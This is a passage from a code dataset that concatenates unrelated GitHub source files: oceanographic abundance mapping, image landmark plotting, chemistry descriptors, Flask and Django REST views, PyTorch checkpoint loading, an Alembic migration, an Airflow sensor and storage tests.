id=\"OTU_{}\".format(line[0]), description=\"\")\n# 
SeqIO.write(rec, out, 'fasta')\n# \n# \n# cmd = \"\"\"/local/two/Software/vsearch-2.15.1/bin/vsearch --usearch_global \\ \n # Tara_OTUs.fasta --db Picozoa_18S_all_V9.fasta -iddef 1 --id 0.90 \\\n # --blast6out TARA_Picozoa_90.out\n# \"\"\"\n# subprocess.run(cmd.split())\n\npicozoa_otus = [line.split()[0] for line in open(\"TARA_Picozoa_90.out\")]\n\ndf = pd.read_csv('TaraOceansV9_globaldataset2009-2012_otus_v20161202.tsv', sep='\\t')\ndf['OTU'] = df['cid'].apply(lambda x: \"OTU_{}\".format(x))\ndf = df[df['OTU'].apply(lambda x: x in picozoa_otus)]\ndf.index = df['OTU']\ndf = df.drop(['pid', 'refs', 'lineage', 'taxogroup','rtotab', 'totab', 'cid', \n 'md5sum', 'sequence', 'OTU'], axis=1)\npico_abundance = df.sum()\n\ndf_all = pd.read_csv('TaraOceansV9_globaldataset2009-2012_otus_v20161202.tsv', sep='\\t')\ndf_all = df_all[df.columns]\nall_abundance = df_all.sum()\n\nenv = pd.read_csv('datasets/TARA_ENV_DEPTH_SENSORS.tab', sep='\\t', skiprows=2597)\nenv.index = env['Sample ID (TARA_barcode#, registered at ...)']\nenv = env[['Latitude', 'Longitude']]\n\ndef get_lat_lon(id, ll):\n try:\n return env.loc[id.split(',')[1], ll]\n except:\n print(id)\n return None\n\npico_rel = pico_abundance/all_abundance * 100\npico_rel = pd.DataFrame(pico_rel, columns=['Abundance'])\npico_rel['Latitude'] = pico_rel.index.map(lambda x: get_lat_lon(x, 'Latitude'))\npico_rel['Longitude'] = pico_rel.index.map(lambda x: get_lat_lon(x, 'Longitude'))\npico_rel = pico_rel.sort_values(by='Abundance')\npico_rel = pico_rel.drop_duplicates(subset=['Latitude','Longitude'],keep='last')\npico_rel = pico_rel[pico_rel['Abundance'] > 0.0]\n\ndef color_levels(abundance):\n if abundance < 1:\n return 'slategrey'\n elif abundance < 5:\n return 'darkviolet'\n elif abundance < 10:\n return 'midnightblue'\n elif abundance < 20:\n return 'orangered'\n elif abundance >= 20:\n return 'darkred'\npico_rel['color'] = pico_rel['Abundance'].apply(lambda x: color_levels(x))\n\n\nfig, ax = plt.subplots(figsize=(20,10), frameon=False)\nm = Basemap(projection='cyl', llcrnrlat=-75, urcrnrlat=75,\n llcrnrlon=-165, urcrnrlon=85, resolution='l', ax=ax)\nm.shadedrelief()\n# m.fillcontinents(color=\"#FFDDCC\", lake_color='#DDEEFF')\n# m.drawmapboundary()\n# m.drawcoastlines(color='gray', linestyle='dotted')\nscat = m.scatter(pico_rel['Longitude'], pico_rel['Latitude'], latlon=True,\n c=pico_rel['Abundance'], cmap=sns.color_palette(\"light:r\", as_cmap=True),\n alpha=0.5, s=pico_rel['Abundance']*15, norm=LogNorm())\n # c=pico_rel['color'], alpha=0.5, s=pico_rel['Abundance']*15)\nm.scatter(-122.013, 36.748, latlon=True, c='black', alpha=1, s=40, marker=\"^\")\nm.scatter(-122.357, 36.695, latlon=True, c='black', alpha=1, s=40, marker=\"^\")\nm.scatter(-123.49, 36.126, latlon=True, c='black', alpha=1, s=40, marker=\"^\")\nm.scatter(19.8633, 58.4880, latlon=True, c='black', alpha=1, s=40, marker=\"^\")\n# 'gist_heat_r' pico_rel['col'] sns.color_palette(\"Spectral_r\", as_cmap=True)\n# plt.colorbar(scat, label='relative abundance [%]', ax=ax)\nfor a, l in zip([0.1, 1, 10, 30], [\"0.1%\",\"1%\",\"10%\",\"30%\"]):\n plt.scatter([], [], c='k', alpha=0.5, s=a*15,\n label=l, norm=LogNorm(), cmap=sns.color_palette(\"light:r\", as_cmap=True))\nplt.scatter([], [], c='black', alpha=1, s=40, label='SAG sampling', marker=\"^\")\nplt.legend(scatterpoints=1, frameon=False,\n labelspacing=1, loc='lower 
left')\nplt.tight_layout()\nplt.savefig('Tara_abundances.pdf')\nplt.close()\n","repo_name":"maxemil/picozoa-scripts","sub_path":"distribution_diversity/get_tara_otus.py","file_name":"get_tara_otus.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71039437053","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nLANDMARK_DIR = '/Users/lucas/My Repo/Active Shape Model/muct-master/muct-landmarks/split/i000qa-fn.txt'\nIMAGE_DIR = '/Users/lucas/My Repo/Active Shape Model/muct-master/a/debug/i000qa-fn.jpg'\nLANDMARK_AMOUNT = 76\n\ndata = np.loadtxt(LANDMARK_DIR)\nx = data[::2, ]\ny = data[1::2, ]\n\nlands = np.hstack((x, y))\n_lands = np.array_split(lands, 2)\nlands1 = np.ndarray.flatten(_lands[0][:])\nlands2 = np.ndarray.flatten(_lands[1][:])\n\n#imageFile = r'i000qa-fn.jpg'\n#image = cv2.cvtColor(cv2.imread(IMAGE_DIR), cv2.COLOR_BGR2GRAY)\n\nim = plt.imread(IMAGE_DIR)\nplt.imshow(im)\nplt.scatter(lands1, lands2)\nplt.show()\n\n# plt.figure(1)\n# plt.imshow(image)\n#plt.scatter(lands1, lands2)\n# plt.show()\n\n\"\"\" for i in range(len(lands1)):\n\n cx = lands1[1]\n cy = lands2[i]\n\n cv2.circle(image, (int(cx), int(cy)), 10, (255, 255, 255), -11)\n cv2.circle(image, (int(cx), int(cy)), 11, (0, 0, 255), 1) # draw circle\n cv2.ellipse(image, (int(cx), int(cy)), (10, 10), 0, 0, 90, (0, 0, 255), -1)\n cv2.ellipse(image, (int(cx), int(cy)), (10, 10),\n 0, 180, 270, (0, 0, 255), -1)\n cv2.circle(image, (int(cx), int(cy)), 1, (0, 255, 0), 1) # draw center\n cv2.putText(image, str(i), (int(cx)+10, int(cy)-10),\n cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 180, 180)) \"\"\"\n\n#print 'plot points completed'\n#cv2.imshow('ImageWindow', image)\n# cv2.waitKey()\n\n#outputfile = 'PlotPoint'+imageFile\n#cv2.imwrite(outputfile, image)\n","repo_name":"lucasbrito92/opencv-plot","sub_path":"testeplot.py","file_name":"testeplot.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33880888366","text":"from collections import OrderedDict\r\n\r\nfrom rdkit import Chem\r\nfrom rdkit.Chem import Descriptors, Crippen, Lipinski, QED\r\n\r\n\r\nMOLECULE_PROPERTIES = OrderedDict({\r\n 'LogP': Crippen.MolLogP,\r\n 'Molecular Weight': Descriptors.MolWt,\r\n 'Polar Surface Area': lambda mol: QED.properties(mol).PSA,\r\n 'Number of Rotatable Bonds': Lipinski.NumRotatableBonds,\r\n 'FSP3': Lipinski.FractionCSP3\r\n})\r\n\r\n\r\ndef get_props(smiles, options):\r\n mol = Chem.MolFromSmiles(smiles)\r\n\r\n if mol is None:\r\n return None\r\n\r\n def get_value(value_func):\r\n return round(value_func(mol), int(options['precision']))\r\n\r\n mol_props = {prop_name: [0, get_value(value_func), \"\", \"\"] for (prop_name, value_func) in MOLECULE_PROPERTIES.items() if prop_name in options}\r\n\r\n return mol_props\r\n","repo_name":"jimmyjbling/Stoplight","sub_path":"Stoplight/prop_calculator.py","file_name":"prop_calculator.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"18023260284","text":"from flask import Blueprint, render_template, Response, request, redirect, url_for\r\nfrom flask_login import login_user, login_required, logout_user, current_user\r\nfrom .auth import webcam_release\r\n\r\nviews = Blueprint('views', __name__)\r\n\r\n\r\n@views.route('/',methods=['GET', 
'POST'])\r\n@login_required\r\ndef home():\r\n    if request.method == 'POST':\r\n        webcam_release()\r\n        logout_user()\r\n        return redirect(url_for('auth.login'))\r\n    return render_template('home.html', user=current_user)\r\n\r\n","repo_name":"IBM-EPBL/IBM-Project-20102-1659712615","sub_path":"Application Building/Building Flask Application-Part 3/Website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"42127454447","text":"import os\nimport argparse\nfrom collections import OrderedDict\n\nimport torch\nimport logging\n\nimport models.resnet\nfrom utils.YParams import YParams\nfrom utils.data_loader import get_data_loader\n\ndef load_experiment(yaml_config_file='./config/photoz.yaml', config='default', load_best_ckpt=True, device=torch.cuda.current_device()):\n    params = YParams(yaml_config_file, config)\n\n    # setup output directory\n    expDir = os.path.join('./expts', config)\n    if not os.path.isdir(expDir):\n        logging.error(\"%s not found\"%expDir)\n        exit(1)\n\n    params['experiment_dir'] = os.path.abspath(expDir)\n    params['checkpoint_path'] = os.path.join(expDir, 'checkpoints/ckpt.tar')\n\n    if not os.path.isfile(params.checkpoint_path):\n        logging.error(\"%s not found\"%params.checkpoint_path)\n        exit(1)\n\n    if load_best_ckpt and not os.path.isfile(params.checkpoint_path.replace('.tar', '_best.tar')):\n        logging.warning(\"No best checkpoint exists, loading last checkpoint instead\")\n        load_best_ckpt = False\n\n    params.log()\n    params['log_to_screen'] = True\n\n    checkpoint_path = params.checkpoint_path\n    if load_best_ckpt:\n        checkpoint_path = checkpoint_path.replace('.tar', '_best.tar')\n\n    model = load_model_from_checkpoint(checkpoint_path, params.num_channels, num_classes=params.num_classes, device=device)\n\n    return model, params\n\ndef load_model_from_checkpoint(checkpoint_path, num_channels=5, num_classes=180, device=torch.cuda.current_device()):\n    model = models.resnet.resnet50(num_channels=num_channels, num_classes=num_classes).to(device)\n\n    logging.info(\"Loading checkpoint %s\"%checkpoint_path)\n    restore_checkpoint(model, checkpoint_path)\n\n    return model\n\ndef restore_checkpoint(model, checkpoint_path):\n    checkpoint = torch.load(checkpoint_path, map_location='cuda:0')\n\n    # some checkpoints have a different name for the model key\n    model_key = 'model_state' if 'model_state' in checkpoint else 'state_dict'\n\n    new_model_state = OrderedDict()\n    for key in checkpoint[model_key].keys():\n        if 'encoder' in key:\n            if 'encoder_q' in key:\n                name = str(key).replace('module.encoder_q.', '')\n                new_model_state[name] = checkpoint[model_key][key]\n        elif 'module.' in key:\n            name = str(key).replace('module.', '')\n            new_model_state[name] = checkpoint[model_key][key]\n\n    msg = model.load_state_dict(new_model_state, strict=False)\n    if msg.missing_keys == ['fc.weight', 'fc.bias']:\n        logging.info(\"Loaded a pretrained model without FC layers; replacing fc with Identity\")\n        model.fc = Identity()\n\n    logging.info(\"Checkpoint loaded. 
Checkpoint epoch %d\"%checkpoint['epoch'])\n\nclass Identity(torch.nn.Module):\n def __init__(self):\n super(Identity, self).__init__()\n\n def forward(self, x):\n return x\n","repo_name":"mahayat/ssl-sky-surveys","sub_path":"utils/load_trained_model.py","file_name":"load_trained_model.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"70176538493","text":"\"\"\"empty message\n\nRevision ID: 269292b8628d\nRevises: 2d9d8f4b00c5\nCreate Date: 2015-11-17 23:41:29.110105\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '269292b8628d'\ndown_revision = '2d9d8f4b00c5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('team',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=80), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.add_column(u'user', sa.Column('team_id', sa.Integer(), nullable=True))\n op.drop_constraint(u'user_org_id_fkey', 'user', type_='foreignkey')\n op.create_foreign_key(None, 'user', 'team', ['team_id'], ['id'])\n op.drop_column(u'user', 'org_id')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column(u'user', sa.Column('org_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'user', type_='foreignkey')\n op.create_foreign_key(u'user_org_id_fkey', 'user', 'org', ['org_id'], ['id'])\n op.drop_column(u'user', 'team_id')\n op.drop_table('team')\n ### end Alembic commands ###\n","repo_name":"ijoosong/cassidy_backend","sub_path":"migrations/versions/269292b8628d_.py","file_name":"269292b8628d_.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29098794597","text":"# _*_ encoding:utf-8 _*_\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom operations.models import UserHistory,UserMessage,UserProblem,UserComment,UserNotebook\nfrom operations.serializers import UserHistorySerializer,UserMessageSerializer,UserProblemSerializer,UserCommentSerializer,\\\n PublishSerializer,MyProblemSerializer,PublisherSerializer,SearchInfoSerializer,UserNotebookSerializer,SubmitCommentSerializer,SendMessageSerializer,\\\n SubmitNotebookSerializer\nfrom users.models import UserProfile\nfrom courses.models import Chapter\nfrom courses.serializers import ChapterSerializer\nfrom others.models import News,AnswerQuestion\nfrom others.serializers import NewsDetailSerializer,AnswerQuestionDetailSerializer\n\n\n\n# Create your views here.\n\n\n#浏览历史响应函数(进度百分比)\n@csrf_exempt\n@api_view(['GET'])\ndef UserHistoryView(request):\n if request.method == 'GET':\n user_id = request.GET['userid']\n historyinfo = UserHistory.objects.filter(user_id=user_id)\n history_serializer = UserHistorySerializer(historyinfo,many=True)\n history_res = {\n \"success\":True,\n \"data\":history_serializer.data\n }\n return Response(history_res)\n else:\n history_res = {\n \"success\":False,\n }\n return 
Response(history_res)\n\n\n#消息列表响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef UserMessageView(request):\n if request.method == 'GET':\n user_id = request.GET['userid']\n UserMessage.objects.filter(user_id=user_id).update(message_hasread=True)\n message_info = UserMessage.objects.filter(user_id=user_id)\n message_serializer = UserMessageSerializer(message_info,many=True)\n message_res = {\n \"success\": True,\n \"data\": message_serializer.data\n }\n return Response(message_res)\n else:\n message_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(message_res)\n\n\n#消息删除响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef MessageDeleteView(request):\n if request.method == 'GET':\n message_id = request.GET['msgid']\n user_id = request.GET['userid']\n message_info = UserMessage.objects.filter(id=message_id).first()\n message_info.delete()\n message_remain = UserMessage.objects.filter(user_id=user_id)\n message_serializer = UserMessageSerializer(message_remain, many=True)\n message_res = {\n \"success\": True,\n \"data\": message_serializer.data\n }\n return Response(message_res)\n else:\n message_res = {\n \"success\": False,\n \"data\":{}\n }\n return Response(message_res)\n\n\n#问题列表响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef ProblemListView(request):\n if request.method == 'GET':\n problem_info = UserProblem.objects.all()\n problem_serializer = UserProblemSerializer(problem_info,many=True)\n problem_res = {\n \"success\":True,\n \"data\":problem_serializer.data\n }\n return Response(problem_res)\n else:\n problem_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(problem_res)\n\n\n#问题详情响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef ProblemDetailView(request):\n if request.method == 'GET':\n problem_id = request.GET['id']\n problem_info = UserProblem.objects.filter(id=problem_id).first()\n comment_info = UserComment.objects.filter(comment_to=problem_id)\n problem_serializer = UserProblemSerializer(problem_info)\n comment_serializer = UserCommentSerializer(comment_info,many=True)\n publisher_serializer = PublisherSerializer(problem_info)\n problemdetail_res = {\n \"success\":True,\n \"data\":{\n \"publisher\":publisher_serializer.data,\n \"comment\":comment_serializer.data,\n \"problem\":problem_serializer.data\n }\n }\n return Response(problemdetail_res)\n else:\n problemdetail_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(problemdetail_res)\n\n\n#删除问题响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef DeleteProblemView(request):\n if request.method == 'GET':\n problem_id = request.GET['problemid']\n problem_info = UserProblem.objects.filter(id=problem_id).first()\n problem_info.delete()\n delete_res = {\n \"success\":True\n }\n return Response(delete_res)\n else:\n delete_res = {\n \"success\":False\n }\n return Response(delete_res)\n\n\n#删除评论响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef DeleteCommentView(request):\n if request.method == 'GET':\n problem_id = request.GET['problemid']\n comment_id = request.GET['commentid']\n comment_info = UserComment.objects.filter(id=comment_id).first()\n comment_info.delete()\n problem_info = UserProblem.objects.filter(id=problem_id).first()\n problem_info.comment_num -= 1\n problem_info.save()\n delete_res = {\n \"success\":True\n }\n return Response(delete_res)\n else:\n delete_res = {\n \"success\":False\n }\n return Response(delete_res)\n\n\n#点赞评论响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef PraiseCommentView(request):\n if request.method == 'GET':\n comment_id = request.GET['commentid']\n comment_info = 
UserComment.objects.filter(id=comment_id).first()\n comment_info.comment_agree += 1\n comment_info.save()\n praise_res = {\n \"success\": True,\n }\n return Response(praise_res)\n else:\n praise_res = {\n \"success\": False,\n }\n return Response(praise_res)\n\n\n#发送消息响应函数\n@csrf_exempt\n@api_view(['POST'])\ndef SendMessageView(request):\n if request.method == 'POST':\n message_serializer = SendMessageSerializer(data=request.data)\n if message_serializer.is_valid():\n message_serializer.save()\n sendMsg_res = {\n \"success\": True,\n \"data\": {\n \"sendMsg\": True\n }\n }\n return Response(sendMsg_res)\n else:\n sendMsg_res = {\n \"success\": True,\n \"data\": {\n \"sendMsg\": False\n }\n }\n return Response(sendMsg_res)\n else:\n sendMsg_res = {\n \"success\": False,\n \"data\": {}\n }\n return Response(sendMsg_res)\n\n\n#问题发布响应函数\n@csrf_exempt\n@api_view(['POST'])\ndef PublishView(request):\n if request.method == 'POST':\n problem_serializer = PublishSerializer(data=request.data)\n if problem_serializer.is_valid():\n problem_serializer.save()\n publish_res = {\n \"success\":True,\n \"publish\":True\n }\n return Response(publish_res)\n else:\n publish_res = {\n \"success\":True,\n \"publish\":False\n }\n return Response(publish_res)\n else:\n publish_res = {\n \"success\":False,\n \"publish\":False\n }\n return Response(publish_res)\n\n\n#我的问题响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef MyProblemView(request):\n if request.method == 'GET':\n user_id = request.GET['userid']\n myproblem_info = UserProblem.objects.filter(user_id=user_id)\n myproblem_serializer = MyProblemSerializer(myproblem_info,many=True)\n myproblem_res = {\n \"success\":True,\n \"data\":myproblem_serializer.data\n }\n return Response(myproblem_res)\n else:\n myproblem_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(myproblem_res)\n\n\n#搜索下拉栏响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef SearchInfoView(request):\n if request.method == 'GET':\n keyword = request.GET['searchinfo']\n chapter_num = Chapter.objects.filter(chapter_name__contains=keyword).count()\n problem_num = UserProblem.objects.filter(problem_title__contains=keyword).count()\n news_num = News.objects.filter(news_title__contains=keyword).count()\n question_num = AnswerQuestion.objects.filter(answer_title__contains=keyword).count()\n searchinfo_res = {\n \"success\":True,\n \"data\":[\n {\n \"msgNum\":chapter_num,\n \"type\":\"课程\",\n \"type_e\":\"class\",\n \"keyword\":keyword\n },\n {\n \"msgNum\": problem_num,\n \"type\": \"问题\",\n \"type_e\": \"problem\",\n \"keyword\": keyword\n },\n {\n \"msgNum\": news_num,\n \"type\": \"新闻\",\n \"type_e\": \"news\",\n \"keyword\": keyword\n },\n {\n \"msgNum\": question_num,\n \"type\": \"官方答疑\",\n \"type_e\": \"question\",\n \"keyword\": keyword\n }\n ]\n }\n return Response(searchinfo_res)\n else:\n searchinfo_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(searchinfo_res)\n\n\n\n#搜索结果响应函数\n@csrf_exempt\n@api_view(['POST'])\ndef SearchSubmitView(request):\n if request.method == 'POST':\n keyword = request.data['keyword']\n type = request.data['type']\n# keyword = request.POST.getlist('keyword')\n# type = request.POST.getlist('type')\n if type == \"class\":\n chapter_info = Chapter.objects.filter(chapter_name__contains=keyword)\n chapter_serializer = ChapterSerializer(chapter_info, many=True)\n searchinfo_res = {\n \"success\": True,\n \"data\": chapter_serializer.data\n }\n return Response(searchinfo_res)\n elif type == \"problem\":\n problem_info = 
UserProblem.objects.filter(problem_title__contains=keyword)\n problem_serializer = UserProblemSerializer(problem_info, many=True)\n searchinfo_res = {\n \"success\": True,\n \"data\": problem_serializer.data\n }\n return Response(searchinfo_res)\n elif type == \"news\":\n news_info = News.objects.filter(news_title__contains=keyword)\n news_serializer = NewsDetailSerializer(news_info, many=True)\n searchinfo_res = {\n \"success\": True,\n \"data\": news_serializer.data\n }\n return Response(searchinfo_res)\n elif type == \"question\":\n ques_info = AnswerQuestion.objects.filter(answer_title__contains=keyword)\n ques_serializer = AnswerQuestionDetailSerializer(ques_info, many=True)\n searchinfo_res = {\n \"success\": True,\n \"data\": ques_serializer.data\n }\n return Response(searchinfo_res)\n else:\n searchinfo_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(searchinfo_res)\n\n\n#笔记显示及提交响应函数\n@csrf_exempt\n@api_view(['GET','POST'])\ndef UserNotebookView(request):\n if request.method == 'GET':\n user_id = request.GET.get('userid')\n lesson_id = request.GET.get('classid')\n note_info = UserNotebook.objects.filter(user_id=user_id,lesson_id=lesson_id).first()\n note_serializer = UserNotebookSerializer(note_info)\n note_res = {\n \"success\":True,\n \"data\":note_serializer.data\n }\n return Response(note_res)\n elif request.method == 'POST':\n user_id = request.data.get('user_id')\n lesson_id = request.data.get('lesson_id')\n# user_id = request.POST.get('userid')\n# lesson_id = request.POST.get('lesson_id')\n notebook_content = request.POST.get('notebook_content')\n note_serializer = SubmitNotebookSerializer(data=request.data)\n if note_serializer.is_valid():\n note_info = UserNotebook.objects.filter(user_id=user_id, lesson_id=lesson_id).first()\n if note_info :\n note_info.delete()\n note_serializer.save()\n note_res = {\n \"success\":True,\n \"data\":{\n \"note\":True,\n \"test\":note_serializer.data\n }\n }\n return Response(note_res)\n else:\n note_res = {\n \"success\":True,\n \"data\":{\n \"note\":False\n }\n }\n return Response(note_res)\n else:\n note_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(note_res)\n\n\n#评论提交响应函数\n@csrf_exempt\n@api_view(['POST'])\ndef SubmitCommentView(request):\n if request.method == 'POST':\n comment_to = request.data['comment_to']\n comment_serializer = SubmitCommentSerializer(data=request.data)\n if comment_serializer.is_valid():\n problem_info = UserProblem.objects.filter(id=comment_to).first()\n problem_info.comment_num += 1\n problem_info.save()\n comment_serializer.save()\n sub_res = {\n \"success\":True,\n \"data\":comment_serializer.data\n }\n return Response(sub_res)\n else:\n sub_res = {\n \"success\":True,\n \"data\":{}\n }\n return Response(sub_res)\n else:\n sub_res = {\n \"success\": False,\n \"data\": {}\n }\n return Response(sub_res)\n\n","repo_name":"hexoctal-sur/beautify_the_page","sub_path":"public/server/apps/operations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16981329","text":"# -*- coding:utf-8 -*-\n\nimport argparse\nimport torch\nimport scipy.io as sio\nfrom torchvision.utils import save_image\nfrom basic_unet import UNet\nfrom Dataset import *\nimport cv2\n\n\"\"\" set flags / seeds \"\"\"\ntorch.backends.cudnn.benchmark = True\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nparser = argparse.ArgumentParser(description=\"\")\nparser.add_argument('--batch_size', 
type=int, default=1)\nparser.add_argument('--data_path', type=str, default='/home/Data/Data/CNV/Model_data/train1')\nparser.add_argument('--model_path', type=str,\n default='logs/gen_pix2pix_[lr=150.0]_five_fold_2/model_G_140000lp_0.400.ckpt')\nparser.add_argument('--results_dir', type=str, default='/home/Data/Data/CNV/Model_data/results_our_new/five_fold_2')\nopt = parser.parse_args()\n\nresults_realA = os.path.join(opt.results_dir, 'realA')\nif not os.path.exists(results_realA):\n os.makedirs(results_realA)\nresults_realB = os.path.join(opt.results_dir, 'realB')\nif not os.path.exists(results_realB):\n os.makedirs(results_realB)\n\nresults_fakeB = os.path.join(opt.results_dir, 'fakeB')\nif not os.path.exists(results_fakeB):\n os.makedirs(results_fakeB)\n\nif __name__ == \"__main__\":\n\n \"\"\" datasets and dataloader \"\"\"\n test_loader = get_data_loaders(opt, 'test')\n\n \"\"\" instantiate network and loss function\"\"\"\n # netG = networks.define_G(3, 1, 64, 'global',\n # n_downsample_global=4, n_blocks_global=9, n_local_enhancers=1,\n # n_blocks_local=3, norm = 'instance', gpu_ids=0)\n\n \"\"\" device configuration \"\"\"\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n netG = UNet(n_in=7, n_out=1, first_channels=32, n_dps=5, use_pool=True, use_bilinear=True,\n norm_type='instance', device=device)\n\n \"\"\"models init or load checkpoint\"\"\"\n # print(torch.load(opt.model_save_path))\n netG.load_state_dict(torch.load(opt.model_path)['netG'])\n\n print('ok')\n\n netG = netG.to(device)\n netG.eval()\n ssim = 0\n\n with torch.no_grad():\n\n for _, sampled_batch_test in enumerate(test_loader):\n real_A, real_B = sampled_batch_test['images'], sampled_batch_test['labels']\n\n # real_A_mid = np.array(real_A_mid.cpu())\n # real_B = real_B[0, 0, :, :]\n # real_B = np.array(real_B.cpu())\n\n real_A = real_A.to(device)\n real_B = real_B.to(device)\n\n fake_B, _ = netG(real_A)\n # fake_B = np.array(fake_B.cpu())\n # fake_B = fake_B[0, 0, :, :]\n real_A_mid = real_A[:, 3, :, :].unsqueeze(1)\n real_B_mid = real_B[:, 3, :, :].unsqueeze(1)\n\n filename = sampled_batch_test['filename']\n filename = filename[0]\n\n # sio.savemat(os.path.join(opt.results_dir, filename), {'realA': real_A_mid, 'realB': real_B, 'fakeB': fake_B})\n\n save_image(real_A_mid, os.path.join(results_realA, filename + '.png'))\n save_image(real_B_mid, os.path.join(results_realB, filename+'.png'))\n save_image(fake_B, os.path.join(results_fakeB, filename + '.png'))\n\n # gen_label = gen_label.mul(255).add_(0.5).clamp_(0, 255).to('cpu', torch.uint8).numpy()\n # seg_out = seg_out.mul(255).add_(0.5).clamp_(0, 255).to('cpu', torch.uint8).numpy()\n # ssim += compare_ssim(gen_label, seg_out)\n\n # ssim /= len(test_dataset)\n # os.rename(opt.img_save_dir, opt.img_save_dir+'ssim_%.3f'%ssim)\n","repo_name":"ZhangYH0502/SHENet","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7275553593","text":"from airflow import AirflowException\nfrom airflow.operators.sensors import BaseSensorOperator\nfrom airflow.utils.decorators import apply_defaults\n\nfrom hooks.hortonworks_ambari_hook import HdpAmbariHook\n\n\nclass AzureHortonWorksBase(BaseSensorOperator):\n\n @apply_defaults\n def __init__(self, ambari_conn_id='hortonworks_ambari_default',\n *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.ambari_conn_id = ambari_conn_id\n self.hook: HdpAmbariHook = 
HdpAmbariHook(ambari_conn_id=self.ambari_conn_id)\n\n self.non_terminated_status_list = ['INIT', 'starting', 'running', 'waiting',\n 'available', 'not_started', 'busy', 'RUNNING', 'PREP']\n\n self.failed_status_list = ['error', 'cancelling', 'cancelled', 'shutting_down',\n 'dead', 'killed', 'KILLED', 'FAILED']\n\n def check_spark_status(self, job_id) -> bool:\n statements_state = self.hook.get_spark_job_status(job_id) or 'INIT'\n if statements_state in self.non_terminated_status_list:\n self.log.debug(\"Checking Hive job: %s\", statements_state)\n return False\n elif statements_state in self.failed_status_list:\n result = \"job failed. state: %s\", statements_state\n self.log.error(result)\n raise AirflowException(result)\n else:\n self.log.debug(\"Checking Spark job: %s\", statements_state)\n return True\n\n def check_hive_status(self, job_id) -> bool:\n status = self.hook.get_hive_job_status(job_id)\n statements_state = status[\"state\"]\n statements_exit_value = status[\"exitValue\"]\n # Check submitted job's result\n if statements_state in self.failed_status_list or statements_exit_value != \"0\":\n result = \"job failed. state: %s, exitValue: \", statements_state, statements_exit_value\n self.log.error(result)\n raise AirflowException(result)\n elif statements_state in self.non_terminated_status_list:\n self.log.debug(\"Checking Hive job: %s\", statements_state)\n return False\n else:\n self.log.debug(\"Statement %s \", statements_state)\n self.log.debug(\n f\"Finished executing WebHCatHiveSubmitOperator with status: {statements_state} : {statements_exit_value}\")\n return True\n","repo_name":"alikemalocalan/airflow-hdinsight-operators","sub_path":"sensors/azure_hortonworks_base.py","file_name":"azure_hortonworks_base.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"34174924125","text":"from .storage import *\n\nimport pytest\n\nfrom .serialization_helpers import get_uuid\nfrom .test_utils import all_objects, UnnamedUUID, MockUUIDObject, MockStorage\n\n\nclass TestStorageTable(object):\n def setup_method(self):\n self.storage = MockStorage()\n # Override default tables/uuids\n self.storage.backend.table_names = [\"all\"]\n self.obj_list = list(all_objects.values())\n self.storage.backend.tables = [self.obj_list]\n self.storage.backend.uuid_table = {\n e.uuid:\n self.storage.backend.row_types[\"uuids\"](uuid=e.uuid, table=0,\n idx=i)\n for i, e in enumerate(self.obj_list)}\n self.table = StorageTable(self.storage, \"all\")\n\n def test_iter(self):\n pytest.skip()\n\n def test_getitem(self):\n pytest.skip()\n\n def test_len(self):\n pytest.skip()\n\n def test_save(self):\n pytest.skip()\n\n @pytest.mark.parametrize(\"s\", [slice(None), # [:]\n 